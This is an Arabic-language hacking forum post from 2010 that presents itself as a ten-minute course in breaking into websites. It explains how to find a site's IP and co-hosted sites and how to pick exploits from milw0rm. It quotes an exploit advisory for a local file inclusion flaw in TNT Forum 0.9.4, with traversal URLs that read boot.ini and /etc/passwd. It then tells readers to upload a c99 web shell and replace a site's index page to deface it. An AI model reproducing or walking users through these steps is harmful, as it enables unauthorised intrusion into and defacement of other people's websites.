منتديات موجه ستار سوفت

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام
سنتشرف بتسجيلك والانضمام للنخبه
سونك ادارة المنتدي المدير العام

منتديات موجه ستار سوفت


    تبي تصير اقوا هكر مواقع تعال معي 10دقايق بس

    شاطر
    avatar
    alaa_yoo7
    المدير العام للمنتدي
    المدير العام للمنتدي

    عدد المساهمات : 1210
    نقاط : 3582
    تاريخ التسجيل : 14/05/2010
    العمر : 26
    الموقع : www.sonk101.yoo7.com

    تبي تصير اقوا هكر مواقع تعال معي 10دقايق بس

    مُساهمة من طرف alaa_yoo7 في يونيو 30th 2010, 2:48 pm

    السلام عليكم جميعآ
    هذي اول مشاركه لي بالمنتدا الحلو حبيت اشارك بشي حلو للمنتدا الحلو <اقول لا يكثر هههههههه
    ابيك تركز زين وتفهمني ..قفل المسن والجوال كمان واذا فيه احد عندك بالغرفه طلعه وخليك بجو هاااااااادئ عشان تركز<~~ماتحس انك طولتها هههههههه يالله..^_^

    بـسم آلله _- نبدأ-_
    آول شي لآزم نعرف آلموقع على آي
    سيرفر

    والسيرفر معنآه ( خآدم )
    ونطلع آلآي بي (ip) آلموووقع
    رآح تقولي يااستكنان كيف آطلع كل هذا ؟؟

    آقولك روح لي (( آبدأ (start) ــــ> وبعدين لي تشغيل (ren) ـــ> بعدين آكتب cmd

    رآح تطلع لك شآشه سودآ
    بعين آكتب ping
    وبعدين رآبط آلموقع بدون (vb) ولآ(http)

    يعني كذا ping www.xxxx.com

    ولاتنسى آلمسآفه بين ping ورآبط آلموقع


    _-_-_-_-_-_-_-_-_-_-_-_-_-_-
    وبعدين تطلع لك آرقآم كثيره كلهآ نفس الشي
    خذ آول آلآرقآم وحفظه

    وبعدين روح لي
    www.live.com
    آو
    www.msn.com

    وكتب كذا :
    ip:XXXXXXXXX
    علمآ آن XXXXX آي بي آلموقع ( ip)

    آلحين طلعنآ آلسيرفر وخلصنآ رآح تقولي
    شلون آبي آخترق آلحين ؟؟؟؟؟؟؟؟؟؟؟؟

    آقولك يآطويل العمر
    روح للموقع هذا :
    http://www.milw0rm.com/×××apps.php

    ودور آخر آلثغرآآت

    ورآح تقولي آنآ لقيت ثغره وشلون آخترق آلموقع آلحين .؟.؟
    آقولك آدخل على آول وحد يعني آول موضوع
    رآح تطلع لك شآشه بيضآء مكتوب عليهآ نفس كذآ :


    ================================================== ====
    TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
    ================================================== ====

    ,--^----------,--------,-----,-------^--,
    | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
    `+---------------------------^----------|
    `\_,-------, _________________________|
    / XXXXXX /`| /
    / XXXXXX / `\ /
    / XXXXXX /\______(
    / XXXXXX /
    / XXXXXX /
    (________(
    `------'


    AUTHOR : CWH Underground
    DATE : 10 June 2008
    SITE : www.citec.us


    ################################################## ###
    APPLICATION : TNT Forum
    VERSION : 0.9.4
    DOWNLOAD : download.tntforum.tuttoeniente.net
    ################################################## ###

    ---LFI---

    ################################################## ###############
    Vulnerable in index.php:

    137: //Variabili generali
    138: $modulo = @$_GET['modulo'];
    139: $modfile = 'mod_'.$modulo.'.php';
    ################################################## ###############

    Exploit:

    [+] For Windows
    /]http://[Target]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00

    [+] For Linux
    http://localhost/tntforum/index.php?.../etc/passwd%00


    ################################################## ################
    # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
    ################################################## ################

    # milw0rm.com [2008-06-10]

    آدري آنك مآفهمت شي

    آلحين روح دور على كلمة :
    Example

    آذآ لقيتهآ رآح تلقآ جنبهآ آو تحتها آستغلال آلثغره ( آلآستغلال هو آهم شي ومآيحتآج شرح )

    وهذآ هو آلآستغلال :
    http://localhost/tntforum/index.php?.../etc/passwd%00


    هذآ تحطه بعد رآبط آلموقع على طول يعني يصير كذآ :
    http://xxxx.com/tntforum/index.php?m.../etc/passwd%00



    علمآ آن آخر كلمة بعد علآمه = هذي=../../../../../../../../هو آلشل وآلشل رآح آعلمك وشهو آلحين

    ولآ تنسى تكتب آخر شي "؟" علامة ؟ هي آهم شي هالعلامه (؟)
    نفضر آننآ طلعنآ آلسيرفر وطلعنآ آلآي بي ip وطلعنآ آلثغره وآلآستغلآل
    نفتضر آن آلرآبط طلع خطأ!!!!
    معنآتهآ آن آلثغره مرقعه يعني مآيصير
    تروح لي للموضوع آلثآني وآنت تدوور على آلآستغلال

    آلحين آنت تقولي من وين آجيب آلشل ؟.
    آقول روح دور بي جوجل google
    آكتب شل c99

    ونآ رآح آسوي موضوع مخصص عن شل c99
    وموضوع مخصص عن آلشل كآمل
    وآنوآعه
    _-__-_-_-_-_-_--_--_------
    آنت آلحين تقولي آنآ رفعت آلشل آلحين
    وش آسوي ؟؟؟؟؟؟؟؟؟؟ووش آلفآيده آلحين .؟؟؟؟؟

    وش آلفآيده ؟ آنك آلحين تشوف كل ملفآت آلموقع بس وتحذف وتعدل بس بشرط !!!!!

    آذآ كآنت حآلتك root على آلسيرفر فأنت آلملك آلحين !
    وذآ كآنت حآلتك user فآنت وزير الملك
    وآذآ كآنت حآلتك nbode
    فآنت زآئر مآتقدر تعدل ولآ تحذف آلآعلى آلموقع آلي عليها تصريح (777)
    تقدر تسوي آلي تبي !
    وتقولي شلون آدري آن فيه موآقع عليها تصريح (777)

    آقولك رآح يكون لونهآ آخضر !

    ولحين رآح تقولي وش آسوي آبي آخترق آلموقع !

    آقولك آذآ كآنت حالتك root آو usrr روح لي :

    هذي الصوره بعد رفع الشل



    رآح آقولك آدخل على آلموقع آلي تبيه

    وبعدين روح لي UP وبعدين آستعرآض وبعدين آندكس آلآخترآآآآآق

    ________________________________

    ومبروووووووووووووووووك آخترقت آلموقع

    يالله ياحلوين ابي اشوف ردودكم <~~~متحمس الاخ ههههه

    يالله حبايبي سي يو في موضوع ثآني واقوا من ذآ


    _________________sonk101
    alaa_yoo7

      الوقت/التاريخ الآن هو سبتمبر 19th 2018, 7:46 pm